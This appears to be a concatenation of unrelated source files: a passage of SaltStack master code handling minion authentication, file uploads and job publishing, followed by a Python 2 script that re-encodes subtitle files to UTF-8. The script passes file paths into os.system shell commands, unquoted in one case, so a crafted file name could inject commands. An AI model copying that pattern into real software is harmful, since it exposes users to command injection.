master minion to access the external job cache self.mminion = salt.minion.MasterMinion( self.opts, states=False, rend=False, ignore_config_errors=True ) self.__setup_fileserver() self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts) def __setup_fileserver(self): ''' Set the local file objects from the file server interface ''' # Avoid circular import import salt.fileserver self.fs_ = salt.fileserver.Fileserver(self.opts) self._serve_file = self.fs_.serve_file self._file_find = self.fs_._find_file self._file_hash = self.fs_.file_hash self._file_hash_and_stat = self.fs_.file_hash_and_stat self._file_list = self.fs_.file_list self._file_list_emptydirs = self.fs_.file_list_emptydirs self._dir_list = self.fs_.dir_list self._symlink_list = self.fs_.symlink_list self._file_envs = self.fs_.file_envs def __verify_minion(self, id_, token): ''' Take a minion id and a string signed with the minion private key The string needs to verify as 'salt' with the minion public key :param str id_: A minion ID :param str token: A string signed with the minion private key :rtype: bool :return: Boolean indicating whether or not the token can be verified. 
''' if not salt.utils.verify.valid_id(self.opts, id_): return False pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_) try: pub = salt.crypt.get_rsa_pub_key(pub_path) except (IOError, OSError): log.warning( 'Salt minion claiming to be %s attempted to communicate with ' 'master, but key could not be read and verification was denied.', id_ ) return False except (ValueError, IndexError, TypeError) as err: log.error('Unable to load public key "%s": %s', pub_path, err) try: if salt.crypt.public_decrypt(pub, token) == b'salt': return True except ValueError as err: log.error('Unable to decrypt token: %s', err) log.error( 'Salt minion claiming to be %s has attempted to communicate with ' 'the master and could not be verified', id_ ) return False def verify_minion(self, id_, token): ''' Take a minion id and a string signed with the minion private key The string needs to verify as 'salt' with the minion public key :param str id_: A minion ID :param str token: A string signed with the minion private key :rtype: bool :return: Boolean indicating whether or not the token can be verified. ''' return self.__verify_minion(id_, token) def __verify_minion_publish(self, clear_load): ''' Verify that the passed information authorized a minion to execute :param dict clear_load: A publication load from a minion :rtype: bool :return: A boolean indicating if the minion is allowed to publish the command in the load ''' # Verify that the load is valid if 'peer' not in self.opts: return False if not isinstance(self.opts['peer'], dict): return False if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')): return False # If the command will make a recursive publish don't run if clear_load['fun'].startswith('publish.'): return False # Check the permissions for this minion if not self.__verify_minion(clear_load['id'], clear_load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warning( 'Minion id %s is not who it says it is and is attempting ' 'to issue a peer command', clear_load['id'] ) return False clear_load.pop('tok') perms = [] for match in self.opts['peer']: if re.match(match, clear_load['id']): # This is the list of funcs/modules! if isinstance(self.opts['peer'][match], list): perms.extend(self.opts['peer'][match]) if ',' in clear_load['fun']: # 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']] clear_load['fun'] = clear_load['fun'].split(',') arg_ = [] for arg in clear_load['arg']: arg_.append(arg.split()) clear_load['arg'] = arg_ # finally, check the auth of the load return self.ckminions.auth_check( perms, clear_load['fun'], clear_load['arg'], clear_load['tgt'], clear_load.get('tgt_type', 'glob'), publish_validate=True) def __verify_load(self, load, verify_keys): ''' A utility function to perform common verification steps. :param dict load: A payload received from a minion :param list verify_keys: A list of strings that should be present in a given load :rtype: bool :rtype: dict :return: The original load (except for the token) if the load can be verified. False if the load is invalid. ''' if any(key not in load for key in verify_keys): return False if 'tok' not in load: log.error( 'Received incomplete call from %s for \'%s\', missing \'%s\'', load['id'], inspect_stack()['co_name'], 'tok' ) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! 
log.warning('Minion id %s is not who it says it is!', load['id']) return False if 'tok' in load: load.pop('tok') return load def _master_tops(self, load): ''' Return the results from an external node classifier if one is specified :param dict load: A payload received from a minion :return: The results from an external node classifier ''' load = self.__verify_load(load, ('id', 'tok')) if load is False: return {} return self.masterapi._master_tops(load, skip_verify=True) # Needed so older minions can request master_tops _ext_nodes = _master_tops def _master_opts(self, load): ''' Return the master options to the minion :param dict load: A payload received from a minion :rtype: dict :return: The master options ''' mopts = {} file_roots = {} envs = self._file_envs() for saltenv in envs: if saltenv not in file_roots: file_roots[saltenv] = [] mopts['file_roots'] = file_roots mopts['top_file_merging_strategy'] = self.opts['top_file_merging_strategy'] mopts['env_order'] = self.opts['env_order'] mopts['default_top'] = self.opts['default_top'] if load.get('env_only'): return mopts mopts['renderer'] = self.opts['renderer'] mopts['failhard'] = self.opts['failhard'] mopts['state_top'] = self.opts['state_top'] mopts['state_top_saltenv'] = self.opts['state_top_saltenv'] mopts['nodegroups'] = self.opts['nodegroups'] mopts['state_auto_order'] = self.opts['state_auto_order'] mopts['state_events'] = self.opts['state_events'] mopts['state_aggregate'] = self.opts['state_aggregate'] mopts['jinja_env'] = self.opts['jinja_env'] mopts['jinja_sls_env'] = self.opts['jinja_sls_env'] mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks'] mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks'] return mopts def _mine_get(self, load): ''' Gathers the data from the specified minions' mine :param dict load: A payload received from a minion :rtype: dict :return: Mine data from the specified minions ''' load = self.__verify_load(load, ('id', 'tgt', 'fun', 'tok')) if load is False: return {} else: return self.masterapi._mine_get(load, skip_verify=True) def _mine(self, load): ''' Store the mine data :param dict load: A payload received from a minion :rtype: bool :return: True if the data has been stored in the mine ''' load = self.__verify_load(load, ('id', 'data', 'tok')) if load is False: return {} return self.masterapi._mine(load, skip_verify=True) def _mine_delete(self, load): ''' Allow the minion to delete a specific function from its own mine :param dict load: A payload received from a minion :rtype: bool :return: Boolean indicating whether or not the given function was deleted from the mine ''' load = self.__verify_load(load, ('id', 'fun', 'tok')) if load is False: return {} else: return self.masterapi._mine_delete(load) def _mine_flush(self, load): ''' Allow the minion to delete all of its own mine contents :param dict load: A payload received from a minion ''' load = self.__verify_load(load, ('id', 'tok')) if load is False: return {} else: return self.masterapi._mine_flush(load, skip_verify=True) def _file_recv(self, load): ''' Allows minions to send files to the master, files are sent to the master file cache ''' if any(key not in load for key in ('id', 'path', 'loc')): return False if not isinstance(load['path'], list): return False if not self.opts['file_recv']: return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False file_recv_max_size = 1024*1024 * self.opts['file_recv_max_size'] if 'loc' in load and load['loc'] < 0: log.error('Invalid file pointer: load[loc] < 0') return 
False if len(load['data']) + load.get('loc', 0) > file_recv_max_size: log.error( 'file_recv_max_size limit of %d MB exceeded! %s will be ' 'truncated. To successfully push this file, adjust ' 'file_recv_max_size to an integer (in MB) large enough to ' 'accommodate it.', file_recv_max_size, load['path'] ) return False if 'tok' not in load: log.error( 'Received incomplete call from %s for \'%s\', missing \'%s\'', load['id'], inspect_stack()['co_name'], 'tok' ) return False if not self.__verify_minion(load['id'], load['tok']): # The minion is not who it says it is! # We don't want to listen to it! log.warning('Minion id %s is not who it says it is!', load['id']) return {} load.pop('tok') # Join path sep_path = os.sep.join(load['path']) # Path normalization should have been done by the sending # minion but we can't guarantee it. Re-do it here. normpath = os.path.normpath(sep_path) # Ensure that this safety check is done after the path # have been normalized. if os.path.isabs(normpath) or '../' in load['path']: # Can overwrite master files!! return False cpath = os.path.join( self.opts['cachedir'], 'minions', load['id'], 'files', normpath) # One last safety check here if not os.path.normpath(cpath).startswith(self.opts['cachedir']): log.warning( 'Attempt to write received file outside of master cache ' 'directory! Requested path: %s. Access denied.', cpath ) return False cdir = os.path.dirname(cpath) if not os.path.isdir(cdir): try: os.makedirs(cdir) except os.error: pass if os.path.isfile(cpath) and load['loc'] != 0: mode = 'ab' else: mode = 'wb' with salt.utils.files.fopen(cpath, mode) as fp_: if load['loc']: fp_.seek(load['loc']) fp_.write(salt.utils.stringutils.to_bytes(load['data'])) return True def _pillar(self, load): ''' Return the pillar data for the minion :param dict load: Minion payload :rtype: dict :return: The pillar data for the minion ''' if any(key not in load for key in ('id', 'grains')): return False if not salt.utils.verify.valid_id(self.opts, load['id']): return False load['grains']['id'] = load['id'] pillar = salt.pillar.get_pillar( self.opts, load['grains'], load['id'], load.get('saltenv', load.get('env')), ext=load.get('ext'), pillar_override=load.get('pillar_override', {}), pillarenv=load.get('pillarenv'), extra_minion_data=load.get('extra_minion_data')) data = pillar.compile_pillar() self.fs_.update_opts() if self.opts.get('minion_data_cache', False): self.masterapi.cache.store('minions/{0}'.format(load['id']), 'data', {'grains': load['grains'], 'pillar': data}) if self.opts.get('minion_data_cache_events') is True: self.event.fire_event({'Minion data cache refresh': load['id']}, tagify(load['id'], 'refresh', 'minion')) return data def _minion_event(self, load): ''' Receive an event from the minion and fire it on the master event interface :param dict load: The minion payload ''' load = self.__verify_load(load, ('id', 'tok')) if load is False: return {} # Route to master event bus self.masterapi._minion_event(load) # Process locally self._handle_minion_event(load) def _handle_minion_event(self, load): ''' Act on specific events from minions ''' id_ = load['id'] if load.get('tag', '') == '_salt_error': log.error( 'Received minion error from [%s]: %s', id_, load['data']['message'] ) for event in load.get('events', []): event_data = event.get('data', {}) if 'minions' in event_data: jid = event_data.get('jid') if not jid: continue minions = event_data['minions'] try: salt.utils.job.store_minions( self.opts, jid, minions, mminion=self.mminion, syndic_id=id_) except 
(KeyError, salt.exceptions.SaltCacheError) as exc: log.error( 'Could not add minion(s) %s for job %s: %s', minions, jid, exc ) def _return(self, load): ''' Handle the return data sent from the minions. Takes the return, verifies it and fires it on the master event bus. Typically, this event is consumed by the Salt CLI waiting on the other end of the event bus but could be heard by any listener on the bus. :param dict load: The minion payload ''' if self.opts['require_minion_sign_messages'] and 'sig' not in load: log.critical( '_return: Master is requiring minions to sign their ' 'messages, but there is no signature in this payload from ' '%s.', load['id'] ) return False if 'sig' in load: log.trace('Verifying signed event publish from minion') sig = load.pop('sig') this_minion_pubkey = os.path.join(self.opts['pki_dir'], 'minions/{0}'.format(load['id'])) serialized_load = salt.serializers.msgpack.serialize(load) if not salt.crypt.verify_signature(this_minion_pubkey, serialized_load, sig): log.info('Failed to verify event signature from minion %s.', load['id']) if self.opts['drop_messages_signature_fail']: log.critical( 'drop_messages_signature_fail is enabled, dropping ' 'message from %s', load['id'] ) return False else: log.info('But \'drop_message_signature_fail\' is disabled, so message is still accepted.') load['sig'] = sig try: salt.utils.job.store_job( self.opts, load, event=self.event, mminion=self.mminion) except salt.exceptions.SaltCacheError: log.error('Could not store job information for load: %s', load) def _syndic_return(self, load): ''' Receive a syndic minion return and format it to look like returns from individual minions. :param dict load: The minion payload ''' loads = load.get('load') if not isinstance(loads, list): loads = [load] # support old syndics not aggregating returns for load in loads: # Verify the load if any(key not in load for key in ('return', 'jid', 'id')): continue # if we have a load, save it if load.get('load'): fstr = '{0}.save_load'.format(self.opts['master_job_cache']) self.mminion.returners[fstr](load['jid'], load['load']) # Register the syndic syndic_cache_path = os.path.join(self.opts['cachedir'], 'syndics', load['id']) if not os.path.exists(syndic_cache_path): path_name = os.path.split(syndic_cache_path)[0] if not os.path.exists(path_name): os.makedirs(path_name) with salt.utils.files.fopen(syndic_cache_path, 'w') as wfh: wfh.write('') # Format individual return loads for key, item in six.iteritems(load['return']): ret = {'jid': load['jid'], 'id': key} ret.update(item) if 'master_id' in load: ret['master_id'] = load['master_id'] if 'fun' in load: ret['fun'] = load['fun'] if 'arg' in load: ret['fun_args'] = load['arg'] if 'out' in load: ret['out'] = load['out'] if 'sig' in load: ret['sig'] = load['sig'] self._return(ret) def minion_runner(self, clear_load): ''' Execute a runner from a minion, return the runner's function data :param dict clear_load: The minion payload :rtype: dict :return: The runner function data ''' load = self.__verify_load(clear_load, ('fun', 'arg', 'id', 'tok')) if load is False: return {} else: return self.masterapi.minion_runner(clear_load) def pub_ret(self, load): ''' Request the return data from a specific jid, only allowed if the requesting minion also initialted the execution. 
:param dict load: The minion payload :rtype: dict :return: Return data corresponding to a given JID ''' load = self.__verify_load(load, ('jid', 'id', 'tok')) if load is False: return {} # Check that this minion can access this data auth_cache = os.path.join( self.opts['cachedir'], 'publish_auth') if not os.path.isdir(auth_cache): os.makedirs(auth_cache) jid_fn = os.path.join(auth_cache, six.text_type(load['jid'])) with salt.utils.files.fopen(jid_fn, 'r') as fp_: if not load['id'] == fp_.read(): return {} # Grab the latest and return return self.local.get_cache_returns(load['jid']) def minion_pub(self, clear_load): ''' Publish a command initiated from a minion, this method executes minion restrictions so that the minion publication will only work if it is enabled in the config. The configuration on the master allows minions to be matched to salt functions, so the minions can only publish allowed salt functions The config will look like this: .. code-block:: bash peer: .*: - .* This configuration will enable all minions to execute all commands: .. code-block:: bash peer: foo.example.com: - test.* The above configuration will only allow the minion foo.example.com to execute commands from the test module. :param dict clear_load: The minion pay ''' if not self.__verify_minion_publish(clear_load): return {} else: return self.masterapi.minion_pub(clear_load) def minion_publish(self, clear_load): ''' Publish a command initiated from a minion, this method executes minion restrictions so that the minion publication will only work if it is enabled in the config. The configuration on the master allows minions to be matched to salt functions, so the minions can only publish allowed salt functions The config will look like this: .. code-block:: bash peer: .*: - .* This configuration will enable all minions to execute all commands. peer: .. code-block:: bash foo.example.com: - test.* The above configuration will only allow the minion foo.example.com to execute commands from the test module. :param dict clear_load: The minion payload ''' if not self.__verify_minion_publish(clear_load): return {} else: return self.masterapi.minion_publish(clear_load) def revoke_auth(self, load): ''' Allow a minion to request revocation of its own key :param dict load: The minion payload :rtype: dict :return: If the load is invalid, it may be returned. No key operation is performed. :rtype: bool :return: True if key was revoked, False if not ''' load = self.__verify_load(load, ('id', 'tok')) if not self.opts.get('allow_minion_key_revoke', False): log.warning( 'Minion %s requested key revoke, but allow_minion_key_revoke ' 'is set to False', load['id'] ) return load if load is False: return load else: return self.masterapi.revoke_auth(load) def run_func(self, func, load): ''' Wrapper for running functions executed with AES encryption :param function func: The function to run :return: The result of the master function that was called ''' # Don't honor private functions if func.startswith('__'): # TODO: return some error? 
Seems odd to return {} return {}, {'fun': 'send'} # Run the func if hasattr(self, func): try: start = time.time() ret = getattr(self, func)(load) log.trace( 'Master function call %s took %s seconds', func, time.time() - start ) except Exception: # pylint: disable=broad-except ret = '' log.error('Error in function %s:\n', func, exc_info=True) else: log.error( 'Received function %s which is unavailable on the master, ' 'returning False', func ) return False, {'fun': 'send'} # Don't encrypt the return value for the _return func # (we don't care about the return value, so why encrypt it?) if func == '_return': return ret, {'fun': 'send'} if func == '_pillar' and 'id' in load: if load.get('ver') != '2' and self.opts['pillar_version'] == 1: # Authorized to return old pillar proto return ret, {'fun': 'send'} return ret, {'fun': 'send_private', 'key': 'pillar', 'tgt': load['id']} # Encrypt the return return ret, {'fun': 'send'} class ClearFuncs(TransportMethods): ''' Set up functions that are safe to execute when commands sent to the master without encryption and authentication ''' # These methods will be exposed to the transport layer by # MWorker._handle_clear expose_methods = ( 'ping', 'publish', 'publish_batch', 'get_token', 'mk_token', 'wheel', 'runner', ) # The ClearFuncs object encapsulates the functions that can be executed in # the clear: # publish (The publish from the LocalClient) # _auth def __init__(self, opts, key): self.opts = opts self.key = key # Create the event manager self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False) # Make a client self.local = salt.client.get_local_client(self.opts['conf_file']) # Make an minion checker object self.ckminions = salt.utils.minions.CkMinions(opts) # Make an Auth object self.loadauth = salt.auth.LoadAuth(opts) # Stand up the master Minion to access returner data self.mminion = salt.minion.MasterMinion( self.opts, states=False, rend=False, ignore_config_errors=True ) # Make a wheel object self.wheel_ = salt.wheel.Wheel(opts) # Make a masterapi object self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key) def runner(self, clear_load): ''' Send a master control function back to the runner system ''' # All runner ops pass through eauth auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load) # Authenticate auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key) error = auth_check.get('error') if error: # Authentication error occurred: do not continue. return {'error': error} # Authorize username = auth_check.get('username') if auth_type != 'user': runner_check = self.ckminions.runner_check( auth_check.get('auth_list', []), clear_load['fun'], clear_load.get('kwarg', {}) ) if not runner_check: return {'error': {'name': err_name, 'message': 'Authentication failure of type "{0}" occurred for ' 'user {1}.'.format(auth_type, username)}} elif isinstance(runner_check, dict) and 'error' in runner_check: # A dictionary with an error name/message was handled by ckminions.runner_check return runner_check # No error occurred, consume sensitive settings from the clear_load if passed. for item in sensitive_load_keys: clear_load.pop(item, None) else: if 'user' in clear_load: username = clear_load['user'] if salt.auth.AuthUser(username).is_sudo(): username = self.opts.get('user', 'root') else: username = salt.utils.user.get_user() # Authorized. Do the job! 
try: fun = clear_load.pop('fun') runner_client = salt.runner.RunnerClient(self.opts) return runner_client.asynchronous(fun, clear_load.get('kwarg', {}), username, local=True) except Exception as exc: # pylint: disable=broad-except log.error('Exception occurred while introspecting %s: %s', fun, exc) return {'error': {'name': exc.__class__.__name__, 'args': exc.args, 'message': six.text_type(exc)}} def wheel(self, clear_load): ''' Send a master control function back to the wheel system ''' jid = clear_load.get('__jid__', salt.utils.jid.gen_jid(self.opts)) # All wheel ops pass through eauth auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load) # Authenticate auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key) error = auth_check.get('error') if error: # Authentication error occurred: do not continue. data = {'error': error, 'jid': jid} self.event.fire_event(data, tagify([jid, "new"], "wheel")) return {'error': error} # Authorize username = auth_check.get('username') if auth_type != 'user': wheel_check = self.ckminions.wheel_check( auth_check.get('auth_list', []), clear_load['fun'], clear_load.get('kwarg', {}) ) if not wheel_check: err_data = { 'name': err_name, 'message': 'Authentication failure of type "{0}" occurred for ' 'user {1}.'.format(auth_type, username) } data = {'error': err_data, 'jid': jid} self.event.fire_event(data, tagify([jid, "new"], "wheel")) return {'error': err_data} elif isinstance(wheel_check, dict) and 'error' in wheel_check: # A dictionary with an error name/message was handled by ckminions.wheel_check return wheel_check # No error occurred, consume sensitive settings from the clear_load if passed. for item in sensitive_load_keys: clear_load.pop(item, None) else: if 'user' in clear_load: username = clear_load['user'] if salt.auth.AuthUser(username).is_sudo(): username = self.opts.get('user', 'root') else: username = salt.utils.user.get_user() # Authorized. Do the job! try: fun = clear_load.pop('fun') tag = tagify(jid, prefix='wheel') data = {'fun': "wheel.{0}".format(fun), 'jid': jid, 'tag': tag, 'user': username} self.event.fire_event(data, tagify([jid, 'new'], 'wheel')) ret = self.wheel_.call_func(fun, full_return=True, **clear_load) data['return'] = ret['return'] data['success'] = ret['success'] self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} except Exception as exc: # pylint: disable=broad-except log.error('Exception occurred while introspecting %s: %s', fun, exc) data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format( fun, exc.__class__.__name__, exc, ) data['success'] = False self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} def mk_token(self, clear_load): ''' Create and return an authentication token, the clear load needs to contain the eauth key and the needed authentication creds. 
''' token = self.loadauth.mk_token(clear_load) if not token: log.warning('Authentication failure of type "eauth" occurred.') return '' return token def get_token(self, clear_load): ''' Return the name associated with a token or False if the token is invalid ''' if 'token' not in clear_load: return False return self.loadauth.get_tok(clear_load['token']) def publish_batch(self, clear_load, minions, missing): batch_load = {} batch_load.update(clear_load) batch = salt.cli.batch_async.BatchAsync( self.local.opts, functools.partial(self._prep_jid, clear_load, {}), batch_load ) ioloop = salt.ext.tornado.ioloop.IOLoop.current() ioloop.add_callback(batch.start) return { 'enc': 'clear', 'load': { 'jid': batch.batch_jid, 'minions': minions, 'missing': missing } } def publish(self, clear_load): ''' This method sends out publications to the minions, it can only be used by the LocalClient. ''' extra = clear_load.get('kwargs', {}) publisher_acl = salt.acl.PublisherACL(self.opts['publisher_acl_blacklist']) if publisher_acl.user_is_blacklisted(clear_load['user']) or \ publisher_acl.cmd_is_blacklisted(clear_load['fun']): log.error( '%s does not have permissions to run %s. Please contact ' 'your local administrator if you believe this is in ' 'error.\n', clear_load['user'], clear_load['fun'] ) return {'error': {'name': 'AuthorizationError', 'message': 'Authorization error occurred.'}} # Retrieve the minions list delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM) _res = self.ckminions.check_minions( clear_load['tgt'], clear_load.get('tgt_type', 'glob'), delimiter ) minions = _res.get('minions', list()) missing = _res.get('missing', list()) ssh_minions = _res.get('ssh_minions', False) # Check for external auth calls and authenticate auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(extra) if auth_type == 'user': auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key) else: auth_check = self.loadauth.check_authentication(extra, auth_type) # Setup authorization list variable and error information auth_list = auth_check.get('auth_list', []) err_msg = 'Authentication failure of type "{0}" occurred.'.format(auth_type) if auth_check.get('error'): # Authentication error occurred: do not continue. log.warning(err_msg) return {'error': {'name': 'AuthenticationError', 'message': 'Authentication error occurred.'}} # All Token, Eauth, and non-root users must pass the authorization check if auth_type != 'user' or (auth_type == 'user' and auth_list): # Authorize the request authorized = self.ckminions.auth_check( auth_list, clear_load['fun'], clear_load['arg'], clear_load['tgt'], clear_load.get('tgt_type', 'glob'), minions=minions, # always accept find_job whitelist=['saltutil.find_job'], ) if not authorized: # Authorization error occurred. Do not continue. 
if auth_type == 'eauth' and not auth_list and 'username' in extra and 'eauth' in extra: log.debug('Auth configuration for eauth "%s" and user "%s" is empty', extra['eauth'], extra['username']) log.warning(err_msg) return {'error': {'name': 'AuthorizationError', 'message': 'Authorization error occurred.'}} # Perform some specific auth_type tasks after the authorization check if auth_type == 'token': username = auth_check.get('username') clear_load['user'] = username log.debug('Minion tokenized user = "%s"', username) elif auth_type == 'eauth': # The username we are attempting to auth with clear_load['user'] = self.loadauth.load_name(extra) # If we order masters (via a syndic), don't short circuit if no minions # are found if not self.opts.get('order_masters'): # Check for no minions if not minions: return { 'enc': 'clear', 'load': { 'jid': None, 'minions': minions, 'error': 'Master could not resolve minions for target {0}'.format(clear_load['tgt']) } } if extra.get('batch', None): return self.publish_batch(clear_load, minions, missing) jid = self._prep_jid(clear_load, extra) if jid is None: return {'enc': 'clear', 'load': {'error': 'Master failed to assign jid'}} payload = self._prep_pub(minions, jid, clear_load, extra, missing) # Send it! self._send_ssh_pub(payload, ssh_minions=ssh_minions) self._send_pub(payload) return { 'enc': 'clear', 'load': { 'jid': clear_load['jid'], 'minions': minions, 'missing': missing } } def _prep_auth_info(self, clear_load): sensitive_load_keys = [] key = None if 'token' in clear_load: auth_type = 'token' err_name = 'TokenAuthenticationError' sensitive_load_keys = ['token'] elif 'eauth' in clear_load: auth_type = 'eauth' err_name = 'EauthAuthenticationError' sensitive_load_keys = ['username', 'password'] else: auth_type = 'user' err_name = 'UserAuthenticationError' key = self.key return auth_type, err_name, key, sensitive_load_keys def _prep_jid(self, clear_load, extra): ''' Return a jid for this publication ''' # the jid in clear_load can be None, '', or something else. this is an # attempt to clean up the value before passing to plugins passed_jid = clear_load['jid'] if clear_load.get('jid') else None nocache = extra.get('nocache', False) # Retrieve the jid fstr = '{0}.prep_jid'.format(self.opts['master_job_cache']) try: # Retrieve the jid jid = self.mminion.returners[fstr](nocache=nocache, passed_jid=passed_jid) except (KeyError, TypeError): # The returner is not present msg = ( 'Failed to allocate a jid. The requested returner \'{0}\' ' 'could not be loaded.'.format(fstr.split('.')[0]) ) log.error(msg) return {'error': msg} return jid def _send_pub(self, load): ''' Take a load and send it across the network to connected minions ''' for transport, opts in iter_transport_opts(self.opts): chan = salt.transport.server.PubServerChannel.factory(opts) chan.publish(load) @property def ssh_client(self): if not hasattr(self, '_ssh_client'): self._ssh_client = salt.client.ssh.client.SSHClient(mopts=self.opts) return self._ssh_client def _send_ssh_pub(self, load, ssh_minions=False): ''' Take a load and send it across the network to ssh minions ''' if self.opts['enable_ssh_minions'] is True and ssh_minions is True: log.debug('Send payload to ssh minions') threading.Thread(target=self.ssh_client.cmd, kwargs=load).start() def _prep_pub(self, minions, jid, clear_load, extra, missing): ''' Take a given load and perform the necessary steps to prepare a publication. TODO: This is really only bound by temporal cohesion and thus should be refactored even further. 
''' clear_load['jid'] = jid delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM) # TODO Error reporting over the master event bus self.event.fire_event({'minions': minions}, clear_load['jid']) new_job_load = { 'jid': clear_load['jid'], 'tgt_type': clear_load['tgt_type'], 'tgt': clear_load['tgt'], 'user': clear_load['user'], 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'minions': minions, 'missing': missing, } # Announce the job on the event bus self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job')) if self.opts['ext_job_cache']: fstr = '{0}.save_load'.format(self.opts['ext_job_cache']) save_load_func = True # Get the returner's save_load arg_spec. try: arg_spec = salt.utils.args.get_function_argspec(self.mminion.returners[fstr]) # Check if 'minions' is included in returner's save_load arg_spec. # This may be missing in custom returners, which we should warn about. if 'minions' not in arg_spec.args: log.critical( 'The specified returner used for the external job cache ' '\'%s\' does not have a \'minions\' kwarg in the returner\'s ' 'save_load function.', self.opts['ext_job_cache'] ) except (AttributeError, KeyError): save_load_func = False log.critical( 'The specified returner used for the external job cache ' '"%s" does not have a save_load function!', self.opts['ext_job_cache'] ) if save_load_func: try: self.mminion.returners[fstr](clear_load['jid'], clear_load, minions=minions) except Exception: # pylint: disable=broad-except log.critical( 'The specified returner threw a stack trace:\n', exc_info=True ) # always write out to the master job caches try: fstr = '{0}.save_load'.format(self.opts['master_job_cache']) self.mminion.returners[fstr](clear_load['jid'], clear_load, minions) except KeyError: log.critical( 'The specified returner used for the master job cache ' '"%s" does not have a save_load function!', self.opts['master_job_cache'] ) except Exception: # pylint: disable=broad-except log.critical( 'The specified returner threw a stack trace:\n', exc_info=True ) # Set up the payload payload = {'enc': 'aes'} # Altering the contents of the publish load is serious!! Changes here # break compatibility with minion/master versions and even tiny # additions can have serious implications on the performance of the # publish commands. # # In short, check with Thomas Hatch before you even think about # touching this stuff, we can probably do what you want to do another # way that won't have a negative impact. 
load = { 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'tgt': clear_load['tgt'], 'jid': clear_load['jid'], 'ret': clear_load['ret'], } # if you specified a master id, lets put that in the load if 'master_id' in self.opts: load['master_id'] = self.opts['master_id'] # if someone passed us one, use that if 'master_id' in extra: load['master_id'] = extra['master_id'] # Only add the delimiter to the pub data if it is non-default if delimiter != DEFAULT_TARGET_DELIM: load['delimiter'] = delimiter if 'id' in extra: load['id'] = extra['id'] if 'tgt_type' in clear_load: load['tgt_type'] = clear_load['tgt_type'] if 'to' in clear_load: load['to'] = clear_load['to'] if 'kwargs' in clear_load: if 'ret_config' in clear_load['kwargs']: load['ret_config'] = clear_load['kwargs'].get('ret_config') if 'metadata' in clear_load['kwargs']: load['metadata'] = clear_load['kwargs'].get('metadata') if 'module_executors' in clear_load['kwargs']: load['module_executors'] = clear_load['kwargs'].get('module_executors') if 'executor_opts' in clear_load['kwargs']: load['executor_opts'] = clear_load['kwargs'].get('executor_opts') if 'ret_kwargs' in clear_load['kwargs']: load['ret_kwargs'] = clear_load['kwargs'].get('ret_kwargs') if 'user' in clear_load: log.info( 'User %s Published command %s with jid %s', clear_load['user'], clear_load['fun'], clear_load['jid'] ) load['user'] = clear_load['user'] else: log.info( 'Published command %s with jid %s', clear_load['fun'], clear_load['jid'] ) log.debug('Published command details %s', load) return load def ping(self, clear_load): ''' Send the load back to the sender. ''' return clear_load
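# --- Illustrative sketch (not part of the Salt source above) ---
# _prep_auth_info (defined earlier in ClearFuncs) keys its behaviour off which
# credential fields are present in the clear load: 'token' first, then 'eauth',
# otherwise the plain 'user' path (which in the real method also hands back the
# master key, omitted here). A minimal standalone rendering of that dispatch,
# using sketch-local names only:
def _sketch_prep_auth_info(clear_load):
    if 'token' in clear_load:
        return 'token', 'TokenAuthenticationError', ['token']
    if 'eauth' in clear_load:
        return 'eauth', 'EauthAuthenticationError', ['username', 'password']
    return 'user', 'UserAuthenticationError', []


if __name__ == '__main__':
    # An eauth-style load marks username/password as the sensitive keys to pop
    # before the load is passed on.
    print(_sketch_prep_auth_info({'eauth': 'pam', 'username': 'svc', 'password': 'x'}))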
all_to_utf8.py
""" Many subtitle files have weird ass encodings like SHIFT-JIS. This python script replaces every file it's piped with good 'ole UTF-8 . The biggest problem with this script is that chardetect can't === EXAMPLE USAGE: recursively converts everything in given directory: find ~/Dir/with/files/ -type f | python all_to_utf8.py """ import sys import os from tqdm import tqdm from multiprocessing import Process def to_utf8(fp, encodings): """Given a file path, converts that file in-place to utf-8 """ def get_charset(fp): """ detect encoding of a file """ # TODO - LOCKING ON head.tmp tmp = os.system('head %s > head.tmp' % fp) output = os.popen('chardetect head.tmp').read() os.system('rm head.tmp') charset = output.split(':')[1].strip().split(' ')[0] return charset.upper() # if that character set is supported by iconv, convert it try: charset = get_charset(fp) if charset in encodings: os.system('iconv -f %s -t UTF-8 "%s" > "%s"' % (charset, fp, fp + '.utf8')) os.system('mv "%s" "%s"' % (fp + '.utf8', fp)) print 'CONVERTED \n\t to "%s" \n\t encoding was: %s' % (fp, charset) else: raise Exception except Exception: print 'SKIPPED \n\t %s' % fp if __name__ == '__main__': # get supported encodings os.system('iconv -l > tmp') supported_encodings = [w.upper() for l in open('tmp').readlines() for w in l.strip().split()] # run concurrently MAX_PROCESSES = 4 processes = set() files = [line.strip() for line in sys.stdin] for file in tqdm(files): p = Process(target=to_utf8, args=(file, supported_encodings,)) p.start() processes.add(p) while len(processes) >= MAX_PROCESSES: processes.difference_update([p for p in processes if not p.is_alive()]) # cleanup os.system('rm tmp')
pfs.py
